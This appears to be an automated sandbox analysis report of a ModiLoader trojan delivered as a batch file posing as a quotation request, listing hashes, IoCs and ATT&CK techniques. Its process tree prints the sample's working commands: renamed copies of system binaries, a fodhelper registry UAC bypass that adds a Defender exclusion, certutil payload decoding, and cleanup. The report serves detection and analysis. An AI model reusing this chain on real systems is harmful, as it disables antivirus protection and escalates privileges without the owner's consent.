modiloader | c91aecc289ef01ff1262a274a65124f7a0d0cdf26308de625ce64231c7aa77d1

General

Target

PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat
Size

4.4MB
MD5

a9f2c8cc828e683395e9a804c120021e
SHA1

6b1f7e910df1792b94690045d3de345cff297ff3
SHA256

c91aecc289ef01ff1262a274a65124f7a0d0cdf26308de625ce64231c7aa77d1
SHA512

c0e6d23b0ba6bc4255938d8b14b563100068e25ab2d9c5e5e9632683c6b1bd28f8fc32b4f2b790400b66977b24f0ff574b2025a7fdee7e968c08d975ff1c227d
SSDEEP

49152:xOp5wZlcwP4QJpMoD8cGL2tojFdpjyPHKbfS4b0umx0TwKi3K6lflLE/B2t3mTss:0

Score

10^/10

modiloader trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

ModiLoader Second Stage 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2796-55-0x00000000031D0000-0x00000000041D0000-memory.dmp	modiloader_stage2

Executes dropped EXE 16 IoCs

Processes:

alpha.exealpha.exealpha.exexkn.exealpha.exealpha.exekn.exealpha.exekn.exeLewxa.comalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe

pid	process
2772	alpha.exe
2160	alpha.exe
2568	alpha.exe
2604	xkn.exe
2608	alpha.exe
2732	alpha.exe
2800	kn.exe
2388	alpha.exe
2524	kn.exe
2796	Lewxa.com
2924	alpha.exe
2012	alpha.exe
2932	alpha.exe
1060	alpha.exe
2680	alpha.exe
936	alpha.exe

Loads dropped DLL 13 IoCs

Processes:

cmd.exealpha.exexkn.exealpha.exealpha.exeWerFault.exe

pid	process
2876	cmd.exe
2876	cmd.exe
2876	cmd.exe
2568	alpha.exe
2604	xkn.exe
2604	xkn.exe
2604	xkn.exe
2876	cmd.exe
2732	alpha.exe
2876	cmd.exe
2388	alpha.exe
2660	WerFault.exe
2660	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2660 2796 WerFault.exe Lewxa.com
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2536 taskkill.exe
1928 taskkill.exe

pid	pid_target	process	target process
2660	2796	WerFault.exe	Lewxa.com

pid	process
2536	taskkill.exe
1928	taskkill.exe

Modifies registry class 5 IoCs

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2756 reg.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

Lewxa.com

pid process

2796 Lewxa.com
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

xkn.exe

pid process

2604 xkn.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

xkn.exetaskkill.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 2604 xkn.exe
Token: SeDebugPrivilege 1928 taskkill.exe
Token: SeDebugPrivilege 2536 taskkill.exe

pid	process
2756	reg.exe

pid	process
2796	Lewxa.com

pid	process
2604	xkn.exe

description	pid	process
Token: SeDebugPrivilege	2604	xkn.exe
Token: SeDebugPrivilege	1928	taskkill.exe
Token: SeDebugPrivilege	2536	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exealpha.exe

description	pid	process	target process
PID 2876 wrote to memory of 2960	2876	cmd.exe	cmd.exe
PID 2876 wrote to memory of 2960	2876	cmd.exe	cmd.exe
PID 2876 wrote to memory of 2960	2876	cmd.exe	cmd.exe
PID 2960 wrote to memory of 2380	2960	cmd.exe	extrac32.exe
PID 2960 wrote to memory of 2380	2960	cmd.exe	extrac32.exe
PID 2960 wrote to memory of 2380	2960	cmd.exe	extrac32.exe
PID 2876 wrote to memory of 2772	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2772	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2772	2876	cmd.exe	alpha.exe
PID 2772 wrote to memory of 3012	2772	alpha.exe	extrac32.exe
PID 2772 wrote to memory of 3012	2772	alpha.exe	extrac32.exe
PID 2772 wrote to memory of 3012	2772	alpha.exe	extrac32.exe
PID 2876 wrote to memory of 2160	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2160	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2160	2876	cmd.exe	alpha.exe
PID 2160 wrote to memory of 2152	2160	alpha.exe	extrac32.exe
PID 2160 wrote to memory of 2152	2160	alpha.exe	extrac32.exe
PID 2160 wrote to memory of 2152	2160	alpha.exe	extrac32.exe
PID 2876 wrote to memory of 2568	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2568	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2568	2876	cmd.exe	alpha.exe
PID 2568 wrote to memory of 2604	2568	alpha.exe	xkn.exe
PID 2568 wrote to memory of 2604	2568	alpha.exe	xkn.exe
PID 2568 wrote to memory of 2604	2568	alpha.exe	xkn.exe
PID 2604 wrote to memory of 2608	2604	xkn.exe	alpha.exe
PID 2604 wrote to memory of 2608	2604	xkn.exe	alpha.exe
PID 2604 wrote to memory of 2608	2604	xkn.exe	alpha.exe
PID 2608 wrote to memory of 2756	2608	alpha.exe	reg.exe
PID 2608 wrote to memory of 2756	2608	alpha.exe	reg.exe
PID 2608 wrote to memory of 2756	2608	alpha.exe	reg.exe
PID 2876 wrote to memory of 2732	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2732	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2732	2876	cmd.exe	alpha.exe
PID 2732 wrote to memory of 2800	2732	alpha.exe	kn.exe
PID 2732 wrote to memory of 2800	2732	alpha.exe	kn.exe
PID 2732 wrote to memory of 2800	2732	alpha.exe	kn.exe
PID 2876 wrote to memory of 2388	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2388	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2388	2876	cmd.exe	alpha.exe
PID 2388 wrote to memory of 2524	2388	alpha.exe	kn.exe
PID 2388 wrote to memory of 2524	2388	alpha.exe	kn.exe
PID 2388 wrote to memory of 2524	2388	alpha.exe	kn.exe
PID 2876 wrote to memory of 2796	2876	cmd.exe	Lewxa.com
PID 2876 wrote to memory of 2796	2876	cmd.exe	Lewxa.com
PID 2876 wrote to memory of 2796	2876	cmd.exe	Lewxa.com
PID 2876 wrote to memory of 2796	2876	cmd.exe	Lewxa.com
PID 2876 wrote to memory of 2924	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2924	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2924	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2012	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2012	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2012	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2932	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2932	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2932	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 1060	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 1060	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 1060	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2680	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2680	2876	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2680	2876	cmd.exe	alpha.exe
PID 2680 wrote to memory of 1928	2680	alpha.exe	taskkill.exe
PID 2680 wrote to memory of 1928	2680	alpha.exe	taskkill.exe
PID 2680 wrote to memory of 1928	2680	alpha.exe	taskkill.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2876

C:\Windows\system32\cmd.exe
cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2960

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
3⤵
PID:2380

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2772

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
3⤵
PID:3012

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2160

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:2152

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2568

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2604

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2608

C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
5⤵
- Modifies registry class
- Modifies registry key
PID:2756

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat" "C:\\Users\\Public\\Lewxa.txt" 9
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2732

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat" "C:\\Users\\Public\\Lewxa.txt" 9
3⤵
- Executes dropped EXE
PID:2800

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2388

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
3⤵
- Executes dropped EXE
PID:2524

C:\Users\Public\Libraries\Lewxa.com
C:\\Users\\Public\\Libraries\\Lewxa.com
2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 724
3⤵
- Loads dropped DLL
- Program crash
PID:2660

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2924

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2012

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2932

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:1060

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2680

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1928

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
2⤵
- Executes dropped EXE
PID:936

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettingsAdminFlows.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2536

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Lewxa.txt
Filesize
3.1MB

MD5
aecbd8ff910c38b1772994a46cf4dcee

SHA1
96e1b7e276e7b19150c259a344e45b9fa04fac43

SHA256
f29aff3e41afb8bdc6aeffbb4dc0f0083a7851a4fae1ef39a44bf72d7ede6c33

SHA512
2919015e969612462b2d5b91e1bfa4ec92277f065628e3b5fc6126974203bd490ab89809f14951ac0a5e9d888dbde98af1ebb3900318fa6d718fd04e89d36d18

Download Submit
C:\Users\Public\Libraries\Lewxa.com
Filesize
1.5MB

MD5
6babecb95e226aef5eef6f80111e04de

SHA1
f2974245b3391f9be136fdf76df36cc5ad0bed2d

SHA256
a561b2ad4fea4284042c99132d49d651f3d409cc41dc6e950dc85a16ae3934a0

SHA512
109d9814b12c61c9579395317dc54a6a0092b3ec1b54d4eab9c3489ffe11971e977f8676f44886e46299bbbf49407e33e02642a0ec151144a3dc72b1a13e0949

Download Submit
C:\Users\Public\alpha.exe
Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
\Users\Public\kn.exe
Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
\Users\Public\xkn.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2604-32-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

Filesize
9.6MB

Download
memory/2604-31-0x0000000001D30000-0x0000000001DB0000-memory.dmp

Filesize
512KB

Download
memory/2604-25-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

Filesize
9.6MB

Download
memory/2604-24-0x0000000001D30000-0x0000000001DB0000-memory.dmp

Filesize
512KB

Download
memory/2604-23-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

Filesize
9.6MB

Download
memory/2604-22-0x0000000002010000-0x0000000002018000-memory.dmp

Filesize
32KB

Download
memory/2604-21-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

Filesize
2.9MB

Download
memory/2796-48-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/2796-50-0x00000000031D0000-0x00000000041D0000-memory.dmp

Filesize
16.0MB

Download
memory/2796-55-0x00000000031D0000-0x00000000041D0000-memory.dmp

Filesize
16.0MB

Download
memory/2796-60-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/2796-61-0x0000000000400000-0x0000000000596000-memory.dmp

Filesize
1.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads